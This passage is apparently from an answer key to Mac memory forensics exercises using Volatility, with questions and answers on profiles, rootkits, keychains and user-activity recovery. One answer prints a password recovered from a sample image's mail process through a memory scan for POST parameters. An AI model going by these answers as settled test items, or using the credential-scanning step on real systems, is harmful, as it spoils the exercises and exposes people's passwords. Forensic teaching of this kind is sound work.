is: False (it supports padded, non-padded, and mach-o) 5. Which of the following is required to build a Mac Volatility profile? A) The kernel header files B) C/C++ Compiler tools C) Mac ports D) The kernel debug kit The correct answer is: D 6. If you have access to an OS X system, then build a Volatility profile for Mac 10.9.3. ---------------------------------------------------------------------- Chapter 29: Mac Memory Overview ---------------------------------------------------------------------- 1. What is the name of the process that spawns the initial launchd process? A) kernel_task B) swapper C) init D) SYSTEM The correct answer is: A 2. When the dyld cache is in use, mac_proc_maps will properly list all shared libraries. True/False? The correct answer is: False (you must use mac_dydl_maps) 3. Mac tracks kernel modules only through a global list of modules. True/False? The correct answer is: False 4. Which command lists active network connections along with their owning process on a live Mac system? A) netstat –an B) netstat –pan C) lsof –i D) lsof -p The correct answer is: C 5. To answer the following questions, analyze mac-sample-1.bin with the provided 10.9.3 profile. A) Which user ID is the vim process run by? B) Is the user logged in locally or remotely? C) What is the path to the file being edited in vim? D) What is the full path to vim on the local system? E) What is the load address of libmacho.dylib inside the running vim process? F) What text was being typed in vim at the time of acquisition? G) Which websites were being accessed around the time of acquisition? Answer: mac_pslist shows that vim is running as user ID 501. mac_pstree shows that vim is spawned by Terminal on the local system. mac_proc_maps can be used to find the full path to vim: $ python vol.py -f mac-sample-1.bin --profile=MacMavericks_10_9_3_AMDx64 mac_proc_maps -p 757 Volatility Foundation Volatility Framework 2.4 (Beta) 757 vim 0x108042000 0x108188000 r-x Macintosh HD/usr/bin/vim mac_dyld_maps can be used to list the library address. The text being typed into vim can be recovered through analysis of the vim heap and also the .swp file created by vim for the file. mac_route can be used to determine which IP addresses the system was connected to. ---------------------------------------------------------------------- Chapter 30: Malicious Code and Rootkits ---------------------------------------------------------------------- 1. DYLD_INSERT_LIBRARIES is similar to which concept of Linux? A) ptrace B) MAP_LIBRARY_ON_START C) LD_PRELOAD D) Inline hooking The correct answer is: C 2. sysctl provides an interface for the kernel to request actions from userland processes. True/False? The correct answer is: True 3. Which of the following is not a standard TrustedBSD policy module? A) TMSafetyNet B) Sandbox C) Quarantine D) AppleEvents The correct answer is: D 4. Which feature of Mac is similar to Windows run keys? A) Launch Agents B) Spotlight C) Service Indexes D) Application Preloads The correct answer is: A 5. The NSCreateObjectFileImageFromMemory API facilitates which of the following anti-forensics techniques? A) Hiding a library from a process' list of libraries B) Process hollowing C) API hooking D) Reconstructed library injection The correct answer is: A 6. To answer the following questions, analyze mac-sample-2.bin with the provided 10.9.3 profile. There is a kernel rootkit installed that you must find and track. A) What is the name of the kernel rootkit? B) How does it hook the system? C) What is the address of the kernel module in memory? D) Extract the kernel module E) What is the MD5 hash of the extracted module? The rootkit is logKext. It can be found through mac_lsmod and mac_notifiers. ---------------------------------------------------------------------- Chapter 31: Tracking User Activity ---------------------------------------------------------------------- 1. The Mac default login keychain only holds the password of the user. True/False? The correct answer is: False (it stores a variety of other passwords and credentials) 2. Each password inside a keychain is encrypted with a different key and must be opened separately. True/False? The correct answer is: False (they're all encrypted with the same key) 3. Which of the following plugins enables rapid development of new application-specific analysis plugins? A) mac_pslist B) mac_proc_maps C) mac_yarascan D) mac_lsof The correct answer is: C 4. How does Volatility recover clear-text OTR messages? A) It finds remnant session keys then attempts to decrypt all recovered encrypted messages B) It finds the clear-text messages displayed to the user through the chat window C) It finds the data structures that hold clear-text messages after they are sent on the wire D) It finds encryption keys in memory then applies them to encrypted messages stored in PCAP files The correct answer is: B 5. To answer the following questions analyze mac-sample-3.bin using the provided 10.9.3 profile. In this sample a user is logged into an email account using the Apple Mail client. A) What is the user account configured for the Apple Mail client to use? B) Which account did the person send an email to and receive a reply from? C) What time was the email sent? D) What is (was) the password to the Gmail account? E) How many emails did the user send? These questions can be answered using mac_yarascan and searching for Gmail and email related activity. The email account is iaminakeychain@gmail.com. The conversation occurred with atcuno@gmail.com. Entire message contents can be found through examination of memory with memdump or yarascan on PID 258 (the mail client). The orignal password to the account can be found by looking for the Passwd HTTPS POST parameter: $ python vol.py -f mac-sample-3.bin --profile=MacMavericks_10_9_3_AMDx64 mac_yarascan -p 258 -Y "&Pass" Volatility Foundation Volatility Framework 2.4 Task: Mail pid 258 rule r1 addr 0x10a06b9ad 0x000000010a06b9ad 26 50 61 73 73 77 64 3d 62 72 65 61 6b 6d 65 64 &Passwd=breakmed 0x000000010a06b9bd 6f 77 6e 34 35 36 26 73 65 72 76 69 63 65 3d 6d own456&service=m 6. To answer the following questions analyze mac-sample-4.bin using the provided 10.9.3 profile. A) Which messages were being written in the Notes application? B) Create a plugin that can automatically find messages within the address space of the TextEdit application. Use this plugin to recover the messages being typed by the user. Answer: The messages being written into the Notes application can be recovered using the mac_notesapp plugin.